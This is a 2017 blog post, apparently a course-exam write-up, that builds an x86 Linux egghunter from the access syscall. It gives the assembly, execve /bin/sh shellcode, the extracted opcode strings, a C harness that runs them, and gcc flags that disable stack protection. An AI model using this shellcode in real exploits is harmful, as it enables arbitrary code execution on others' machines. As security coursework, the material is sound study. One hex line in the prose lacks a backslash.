Thursday, March 23, 2017

SLAE32 Exam - Assignment 3 of 7 (Egghunter Shellcode)

This post is the third of 7 exam assignments of the Pentester Academy's x86 Assembly Language and Shellcoding on Linux course.  Success in these 7 assignments results in the Pentester Academy's SLAE32 certification.

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

SLAE - 901

The files used in this assignment are here:
https://github.com/clubjk/SLAE32/tree/master/exam/task3


Assignment 3 Requirements
  • Study the egg hunter shellcode. It is similar to a two stage shellcode.
  • The first stage searches for a pattern it can find in memory. That pattern signifies where the second stage lies which needs to be executed.
  • Create a working demo of an egg hunter. It should be configurable for different payloads. This means that once the pattern has been found the second stage should be easily configurable.

Here are the steps:
  1. Create an egg hunter assembly script that can be object dumped.
  2. Create a shellcode payload (execve that generates a /bin/sh shell)
  3. Integrate the egghunter and the shellcode into an exploit



1.  Create and egg hunter assembly script that can be object dumped.


        I chose to use the access system call for this egg hunter.  Here is my script:

global _start

section .text

_start:

cld
xor eax, eax ;zeroize the register
xor edx, edx ;zeroize the register

next_page:

or dx, 0xfff  ;align the page

increment_address:

inc edx ;increment the edx
lea ebx, [edx +0x4] ;add 4 to the edx value and put in ebx
mov eax, 0x21 ;place system call 33 (access) in eax
int 0x80     ;invoke system call

search_vas:

cmp al, 0xf2    ;check return value with EFAULT return
                      value
;if the same then zero flag (ZF) will be  
                      set

je next_page    ;jump if eax ends in f2
mov eax, 0x41414141   ;AAAA (this will be the egg)
mov edi, edx    ;edi is being used by scas (scan string and
                      compare w al)

scasd           ;checks mem contents in edi w the dword in 
                      eax (0x41414141)
;if equal, found "egg"

jne increment_address   ;if al is not equal to 0xf2 jump to
                              increment address function

;otherwise the edi by 4 bytes (next address)

scasd ;same as previous scasd

jne increment_address ;same as previous
jmp edi         ;jump to the address of the shellcode

                      memloc in edi

2.  Create a shellcode payload (execve that generates a /bin/sh shell)

global _start

section .text

_start:

xor eax, eax   ;zeroize the eax
push eax       ;push 0x0 on the stack
push 0x68732f2f        ;push "hs//" on the stack
push 0x6e69622f        ;push "nib/" on the stack
mov ebx, esp           ;move the memory location of the
                             start of stack (esp) to ebx
push eax       ;push 0x0 on the stack
mov edx, esp   ;move the memory location of the start of  
                     stack (esp) to edx
push ebx       ;push ebx on the stack
mov ecx, esp   ;move the memory location of the start of 
                     stack (esp) to ecx
mov al, 0xb    ;move the execve functional call number (11) 
                     to eax

int 0x80       ;invokes the execve system call


3. Integrate the egghunter and the shellcode into an exploit

Here is the finished product of this step:

/*
Egghunter Shellcode
shellcode.c
Author: clubjk
*/

#include<stdio.h>
#include<string.h>

#define EGG "\x41\x41\x41\x41" //AAAA

char egg[] = EGG;

unsigned char egg_hunter[] = \

//jk's egghunter from nasm
"\xfc\x31\xc0\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\xb8\x21\x00\x00\x00\xcd\x80\x3c\xf2\x74\xec\xb8"
EGG
"\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7";


unsigned char second_stage[] = \
EGG 
EGG 
//jk's execve shellcode                               
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

main()
{
printf("[+] Searching for: %s\n", EGG);
printf("[+] Egg Hunter Length: %d\n", strlen(egg_hunter));
printf("[+] Shellcode Length: %d\n", strlen(second_stage));
int (*ret)() = (int(*)())egg_hunter;
ret();

}


The second stage can hold other payloads as desired.


I compiled both nasm files with the following commands:

$ nasm -f elf32 -o [file].o [file].nasm
$ ld -o [file] [file].o

I used the following objdump command to extract executable bytes from the binaries:


$ objdump -d ./[binary]|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'


The egghunter binary yielded the following executable bytes from the above command:

"\xfc\x31\xc0\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\xb8\x21\x00\x00\x00\xcd\x80\x3c\xf2\x74\xec\xb8\x41\x41\x41\x41\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"

I identified the "egg" (AAAA in hex; highlighted above in blue) and organized the string as below to facilitate the use of the "EGG" variable in the shellcode.c:

"\xfc\x31\xc0\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\xb8\x21\x00\x00\x00\xcd\x80\x3c\xf2\x74\xec\xb8"
EGG
"x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7";

Then, I placed the above in the shellcode.c, under the unsigned char egg_hunter section.

I used the same objdump command above to extract the execve binary's shellcode and placed it intact into the unsigned char second_stage section, prepending it with two "EGG"'s.

I compiled shellcode.c with the following command:


$ gcc  -ggdb -fno-stack-protector -z execstack shellcode.c -o shellcode



It worked.  Yay.

Here is the link to the scripts:
https://github.com/clubjk/SLAE32/tree/master/exam/task3

No comments:

Post a Comment